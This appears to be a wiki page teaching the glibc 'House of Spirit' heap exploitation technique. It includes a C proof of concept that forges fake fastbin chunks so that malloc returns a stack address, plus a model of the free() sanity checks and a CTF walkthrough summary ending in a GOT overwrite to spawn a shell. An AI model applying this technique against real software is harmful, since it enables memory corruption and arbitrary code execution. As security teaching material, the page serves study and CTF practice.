
# House of Spirit


## Basic Information

### Code

<details>

<summary>House of Spirit</summary>

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// Code altered to add some prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
  size_t prev_size;
  size_t size;
  struct fast_chunk *fd;
  struct fast_chunk *bk;
  char buf[0x20];                   // chunk falls in fastbin size range (0x40 total)
};

int main() {
  struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory (on the stack)
  void *ptr, *victim;

  ptr = malloc(0x30);               // real 0x40 chunk, same bin as the fake ones

  printf("Original alloc address: %p\n", ptr);
  printf("Main fake chunk:%p\n", &fake_chunks[0]);
  printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

  // Passes size check of "free(): invalid size"
  fake_chunks[0].size = sizeof(struct fast_chunk);

  // Passes "free(): invalid next size (fast)"
  fake_chunks[1].size = sizeof(struct fast_chunk);

  // Attacker overwrites a pointer that is about to be 'freed'
  // Point to .fd as it's the start of the content of the chunk
  ptr = (void *)&fake_chunks[0].fd;

  // fake_chunks[0] gets inserted into the fastbin / tcache
  free(ptr);

  // The next allocation of the same size returns the fake (stack) chunk
  victim = malloc(0x30);
  printf("Victim: %p\n", victim);

  return 0;
}
```

</details>

### Goal

* Be able to add an address into the tcache / fast bin so later it's possible to allocate it

### Requirements

* This attack requires an attacker to be able to create a couple of fake fast chunks correctly indicating their size value and then to be able to free the first fake chunk so it gets into the bin.

### Attack

* Create fake chunks that bypass the security checks: you will need basically 2 fake chunks indicating correctly the right size values
* Somehow manage to free the first fake chunk so it gets into the fast bin or tcache and then allocate it to overwrite that address

**The code from** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **is great to understand the attack.** Although this schema from the code summarises it pretty well:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/
```

{% hint style="info" %} Note that it's necessary to create the second chunk in order to bypass some sanity checks. {% endhint %}
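To make those sanity checks concrete, here is an added example (not code from the original page, from dhavalkapil or from guyinatuxedo) that models the checks glibc's `_int_free` runs on the fastbin path before linking a chunk, and therefore shows why the size field of the second fake chunk has to be plausible. It assumes x86-64 glibc defaults (16-byte alignment, `MINSIZE` 0x20, `global_max_fast` 0x80) and that tcache is disabled or full; the stack address and `system_mem` value are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed x86-64 glibc defaults (not values from the page). */
#define SIZE_SZ          8
#define MALLOC_ALIGN     16
#define MINSIZE          (4 * SIZE_SZ)   /* 0x20 */
#define CHUNK_HDR_SZ     (2 * SIZE_SZ)   /* 0x10 */
#define DEFAULT_MAX_FAST 0x80            /* global_max_fast with default M_MXFAST */
#define SIZE_BITS        7               /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

enum free_verdict {
    FREE_OK_FASTBIN = 0,      /* chunk would be linked into a fastbin */
    FREE_INVALID_POINTER,     /* abort: "free(): invalid pointer" */
    FREE_INVALID_SIZE,        /* abort: "free(): invalid size" */
    FREE_NOT_FASTBIN,         /* size > global_max_fast: not a fastbin chunk */
    FREE_INVALID_NEXT_SIZE    /* abort: "free(): invalid next size (fast)" */
};

/* Model of the checks _int_free applies before linking a chunk into a fastbin
 * (tcache disabled or full). mem: pointer passed to free(); size: size field of
 * the fake chunk header; next_size: size field of the chunk that follows it at
 * p + chunksize; system_mem: the arena's av->system_mem. */
enum free_verdict check_fake_free(uintptr_t mem, size_t size, size_t next_size,
                                  size_t system_mem)
{
    uintptr_t p = mem - CHUNK_HDR_SZ;            /* mem2chunk(mem) */
    size_t csz = size & ~(size_t)SIZE_BITS;      /* chunksize(p), flag bits stripped */
    if (p > (uintptr_t)-csz || (p & (MALLOC_ALIGN - 1)) != 0)
        return FREE_INVALID_POINTER;
    if (csz < MINSIZE || (csz & (MALLOC_ALIGN - 1)) != 0)
        return FREE_INVALID_SIZE;
    if (csz > DEFAULT_MAX_FAST)
        return FREE_NOT_FASTBIN;
    /* Only the size field of the following chunk is read: this is the check
       that the second fake chunk exists to satisfy. */
    if (next_size <= CHUNK_HDR_SZ || (next_size & ~(size_t)SIZE_BITS) >= system_mem)
        return FREE_INVALID_NEXT_SIZE;
    return FREE_OK_FASTBIN;
}

int main(void)
{
    uintptr_t mem = 0x7ffc0000a010;  /* constructed, 16-byte aligned stack address */
    printf("sizes 0x40/0x40: %d (0 = accepted)\n", check_fake_free(mem, 0x40, 0x40, 0x21000));
    printf("sizes 0x40/0x00: %d (next-size check fails)\n", check_fake_free(mem, 0x40, 0, 0x21000));
    return 0;
}
```

With tcache enabled and not full, the freed fake chunk goes into tcache instead and only the pointer and size checks apply, so the next-size check is what the second fake chunk protects against on the fastbin path.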

## Examples

* CTF [https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html](https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html)
  * Libc infoleak: Via an overflow it's possible to change a pointer to point to a GOT address in order to leak a libc address via the read action of the CTF
  * House of Spirit: Abusing a counter that counts the number of "rifles" it's possible to generate a fake size of the first fake chunk, then abusing a "message" it's possible to fake the second size of a chunk and finally abusing the overflow it's possible to change a pointer that is going to be freed so our first fake chunk is freed. Then, we can allocate it and inside of it there is going to be the address to where "message" is stored. Then, it's possible to make this point to the `scanf` entry inside the GOT table, so we can overwrite it with the address of `system`. Next time `scanf` is called, we can send the input `"/bin/sh"` and get a shell.

## References
